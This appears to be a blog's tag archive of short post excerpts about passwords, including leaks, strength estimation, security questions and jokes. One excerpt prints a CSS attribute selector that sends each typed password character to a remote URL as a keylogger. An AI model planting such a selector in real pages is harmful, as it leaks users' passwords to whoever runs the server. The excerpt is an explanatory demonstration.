Tag Archives: password

CSS Keylogger (and why you shouldn’t worry about it)

By leveraging CSS attribute selectors it is, in theory, possible to write a keylogger in pure CSS. The selector below, for example, targets all input[type="password"] elements whose value ends with the character a: input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } The theory … Continue reading

Password Policy

"Your password must contain at least 8 letters, a capital, a plot, a protagonist with good character development, a twist & a happy ending." — Thomas J Carr (@OpenWithMit) October 13, 2014

Adobe Crossword

A crossword based on the Adobe password leak. The answers to the crossword are chosen from the 1000 most used passwords for Adobe user accounts from the recent password leak. The clues are up to 50 of the most commonly … Continue reading

Security Question

Your mother’s maiden name is on Ancestry.com, your high school mascot is on Classmates, your birthday is on Facebook, and so is your best friend’s name—even if it takes a few tries. — Mat Honan

Yes, a repost.

zxcvbn: realistic password strength estimation

Simplistic strength estimation gives bad advice. Without checking for common patterns, the practice of encouraging numbers and symbols means encouraging passwords that might only be slightly harder for a computer to crack, and yet frustratingly harder for a human to … Continue reading

Kill the Password: Why a String of Characters Can’t Protect Us Anymore

Mat Honan, whose digital life was destroyed this summer, on passwords: The age of the password has come to an end; we just haven’t realized it yet. And no one has figured out what will take its place. What we … Continue reading

Fixing the petname-as-my-password dogma.

Popular pet names Rover, Cheryl and Kate could be a thing of the past. Banks are now advising parents to think carefully before naming their child’s first pet. For security reasons, the chosen name should have at least eight characters, … Continue reading


Today, 6.5 million LinkedIn password hashes leaked. These hashes are unsalted SHA-1 hashes and can be found online. If you happen to have the file lingering around, use grep "yourhash" combo_not.txt to check whether your hash is in it. Also check with … Continue reading

Intercepting LinkedIn Passwords

At the Microsoft TechDays 2012 in Belgium, white hat Paula Januszkiewicz shows how the tool Fiddler can be used to intercept the password of a LinkedIn user. The reason is that the password is not being encrypted by LinkedIn, although … Continue reading
